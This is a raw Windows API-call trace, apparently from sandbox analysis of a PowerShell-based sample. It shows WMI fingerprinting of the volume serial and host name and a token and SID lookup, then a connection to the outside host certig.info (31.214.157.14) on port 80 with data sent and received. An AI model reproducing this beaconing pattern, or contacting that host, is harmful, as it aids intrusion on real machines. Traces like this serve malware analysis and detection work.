	[0175.388] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.388] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0175.389] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__RELPATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.389] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0175.389] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.389] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b875f40*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b878860, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x1c68ccdc*=8200, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.403] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__SERVER", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.403] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0175.404] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.404] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.404] IWbemClassObject:Get (in: This=0x1cc34830, wszName="__PATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0175.404] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0175.404] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cd80 | out: puCount=0x1c68cd80*=0x2) returned 0x0
	[0175.404] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd80*=0x17, pszText=0x0) returned 0x0
	[0175.404] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.404] IWbemClassObject:Get (in: This=0x1cc34830, wszName="SerialNumber", lFlags=0, pVal=0x1c68cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd6c*=0, plFlavor=0x1c68cd68*=0 | out: pVal=0x1c68cd70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c68cd6c*=19, plFlavor=0x1c68cd68*=0) returned 0x0
	[0175.404] IWbemClassObject:Get (in: This=0x1cc34830, wszName="SerialNumber", lFlags=0, pVal=0x1c68cfa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cf9c*=19, plFlavor=0x1c68cf98*=0 | out: pVal=0x1c68cfa0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c68cf9c*=19, plFlavor=0x1c68cf98*=0) returned 0x0
	[0176.468] GetCurrentProcess () returned 0xffffffffffffffff
	[0176.468] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cbc8 | out: TokenHandle=0x1c68cbc8*=0x4a8) returned 1
	[0176.491] GetCurrentProcess () returned 0xffffffffffffffff
	[0176.491] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68ce28 | out: TokenHandle=0x1c68ce28*=0x4ac) returned 1
	[0176.491] GetTokenInformation (in: TokenHandle=0x4a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1c68ce18 | out: TokenInformation=0x0, ReturnLength=0x1c68ce18) returned 0
	[0176.491] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b875f30
	[0176.491] GetTokenInformation (in: TokenHandle=0x4a8, TokenInformationClass=0x1, TokenInformation=0x1b875f30, TokenInformationLength=0x2c, ReturnLength=0x1c68ce18 | out: TokenInformation=0x1b875f30, ReturnLength=0x1c68ce18) returned 1
	[0176.493] LocalFree (hMem=0x1b875f30) returned 0x0
	[0176.500] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x1c68cc48, DesiredAccess=0x800, PolicyHandle=0x1c68cc40 | out: PolicyHandle=0x1c68cc40) returned 0x0
	[0176.594] LsaLookupSids (in: PolicyHandle=0x1b875f30, Count=0x1, Sids=0x3000a28*=0x3000988*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x1c68ccd0, Names=0x1c68ccc8 | out: ReferencedDomains=0x1c68ccd0, Names=0x1c68ccc8) returned 0x0
	[0176.595] LsaClose (ObjectHandle=0x1b875f30) returned 0x0
	[0176.595] LsaFreeMemory (Buffer=0x265790) returned 0x0
	[0176.596] LsaFreeMemory (Buffer=0x1b86a080) returned 0x0
	[0176.952] send (s=0x408, buf=0x30041c8*, len=121, flags=0) returned 121
	[0176.963] recv (in: s=0x408, buf=0x2efd9a8, len=502, flags=0 | out: buf=0x2efd9a8*) returned 502
	[0176.975] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0177.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.722] CoTaskMemAlloc (cb=0x104) returned 0x1b87c8a0
	[0177.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87c8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0177.722] CoTaskMemFree (pv=0x1b87c8a0) 
	[0177.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c68d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0181.427] CoTaskMemAlloc (cb=0x104) returned 0x1b87c8a0
	[0181.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b87c8a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0181.427] CoTaskMemFree (pv=0x1b87c8a0) 
	[0182.042] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4a8
	[0194.890] CloseHandle (hObject=0x4a8) returned 1
	[0194.910] shutdown (s=0x408, how=2) returned 0
	[0194.910] closesocket (s=0x408) returned 0
	[0195.463] CoTaskMemAlloc (cb=0xd) returned 0x1b886b10
	[0195.463] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c68cd40*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c68cd38 | out: ppResult=0x1c68cd38*=0x1b862330*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b886b70*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0195.562] CoTaskMemFree (pv=0x1b886b10) 
	[0195.562] CoTaskMemFree (pv=0x0) 
	[0195.562] FreeAddrInfoW (pAddrInfo=0x1b862330*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b886b70*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0195.562] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408
	[0195.562] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a8
	[0195.563] WSAConnect (in: s=0x408, name=0x2f3f418*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0195.597] closesocket (s=0x4a8) returned 0
	[0195.809] recv (in: s=0x408, buf=0x31345f8, len=502, flags=0 | out: buf=0x31345f8*) returned 117
	[0195.831] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0195.839] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0195.839] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0195.839] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0195.840] IUnknown:Release (This=0x221868) returned 0x1
	[0195.842] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc317e0) returned 0x0
	[0195.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc317e0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0195.842] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc317e0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc34510) returned 0x0
	[0195.842] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc34510, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc34510) returned 0x0
	[0195.843] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc34510, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0195.898] WbemDefPath:IUnknown:AddRef (This=0x1cc34510) returned 0x3
	[0195.898] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
	[0195.898] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc34510, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b886b50) returned 0x0
	[0195.898] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b886b50, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0195.899] WbemDefPath:IUnknown:Release (This=0x1b886b50) returned 0x3
	[0195.899] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0195.899] WbemDefPath:IUnknown:AddRef (This=0x1cc34510) returned 0x4
	[0195.899] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc34510, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0195.899] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x3
	[0195.899] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x2
	[0195.899] WbemDefPath:IUnknown:Release (This=0x1cc317e0) returned 0x0
	[0195.900] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x1
	[0195.900] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0195.900] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0195.900] WbemDefPath:IUnknown:AddRef (This=0x1cc34510) returned 0x2
	[0195.900] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc34510, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc34510) returned 0x0
	[0195.900] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x2
	[0195.900] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x1
	[0195.900] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0195.900] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0195.900] WbemDefPath:IUnknown:AddRef (This=0x1cc34510) returned 0x2
	[0195.900] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc34510, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc34510) returned 0x0
	[0195.901] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x2
	[0195.901] WbemDefPath:IUnknown:AddRef (This=0x1cc34510) returned 0x3
	[0195.901] WbemDefPath:IWbemPath:SetText (This=0x1cc34510, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.901] WbemDefPath:IUnknown:Release (This=0x1cc34510) returned 0x2
	[0195.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0195.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0195.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc34510, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0195.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0195.901] WbemDefPath:IWbemPath:GetText (in: This=0x1cc34510, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.901] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0195.902] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0195.902] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0195.902] IUnknown:Release (This=0x221868) returned 0x1
	[0195.902] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc31880) returned 0x0
	[0195.902] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31880, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0195.902] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc31880, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc318a0) returned 0x0
	[0195.903] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc318a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc318a0) returned 0x0
	[0195.903] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc318a0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0195.903] WbemLocator:IUnknown:AddRef (This=0x1cc318a0) returned 0x3
	[0195.903] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0195.903] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc318a0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0195.903] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0195.904] WbemLocator:IUnknown:AddRef (This=0x1cc318a0) returned 0x4
	[0195.904] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc318a0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0195.904] WbemLocator:IUnknown:Release (This=0x1cc318a0) returned 0x3
	[0195.904] WbemLocator:IUnknown:Release (This=0x1cc318a0) returned 0x2
	[0195.904] WbemLocator:IUnknown:Release (This=0x1cc31880) returned 0x0
	[0195.904] WbemLocator:IUnknown:Release (This=0x1cc318a0) returned 0x1
	[0195.904] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0195.904] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0195.904] WbemLocator:IUnknown:AddRef (This=0x1cc318a0) returned 0x2
